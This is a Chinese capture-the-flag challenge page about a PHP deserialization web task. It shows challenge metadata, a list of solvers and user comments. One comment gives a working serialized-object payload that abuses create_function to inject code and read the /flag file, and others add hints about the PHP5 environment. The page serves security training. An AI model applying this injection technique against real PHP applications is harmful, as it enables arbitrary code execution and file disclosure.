unserialize-NoteasyWEB 未解决

分数: 30 金币: 3
题目作者: 云牧青
一  血: Lazzaro
一血奖励: 5金币
解  决: 500
提  示:
描  述:
不简单的反序列化
评论
limu 2年前

真心不会等在提升一段时间再来做

回复 0

chips 2年前

真心不会等在提升一段时间再来做

回复 0

cxh82878583 2年前

真心不会等在提升一段时间再来做

回复 0

mooho 2年前

真心不会等在提升一段时间再来做

回复 0

笨笨笨蛋 2年前

寄了,不会

回复 2

18679066006 2年前

$s=new Noteasy('create_function',';};highlight_file("/flag");/*'); echo urlencode(serialize($s));

回复 0

a1037214089 2年前

家人们 那个wp里的$b 为什么不需要考虑闭合的问题啊?create_function("",;}show_source('/flag');/*在语法上不会报错吗?我构造了一个能够闭合create_function的(的payload 结果不行....

回复 1

v3277293 2年前

哇,终于做出来了

回复 0

W01fh4cker 3年前

提示:本题关键在于$a("", $b);,同时本题环境不是PHP7.2,是PHP5;查看flag可以是highlight_file也可以是show_source。

回复 0

ShawRoot 3年前

不用那么麻烦,直接使用highlight_file就可以查看flag。

回复 2

WriteUp

image
云牧青

5 金币

评分(2)

解题动态

网络安全亮 攻破了该题 3天前
王者荣耀 攻破了该题 5天前
2022215848 攻破了该题 5天前
vanilla0725 攻破了该题 7天前
Da1ly_1upup 攻破了该题 14天前
yafoolaw 攻破了该题 14天前
gfzt 攻破了该题 15天前
souljian03 攻破了该题 15天前
124要留就要77 攻破了该题 15天前
xwbws1 攻破了该题 16天前
bugkuctfmike6 攻破了该题 16天前
2141761066 攻破了该题 17天前
bugtest 攻破了该题 20天前
18940001335 攻破了该题 20天前
果子酪 攻破了该题 22天前
是大方子 攻破了该题 23天前
liuweiak007 攻破了该题 23天前
navalible 攻破了该题 24天前
The-Beacon 攻破了该题 24天前
小坑西1 攻破了该题 24天前
问题反馈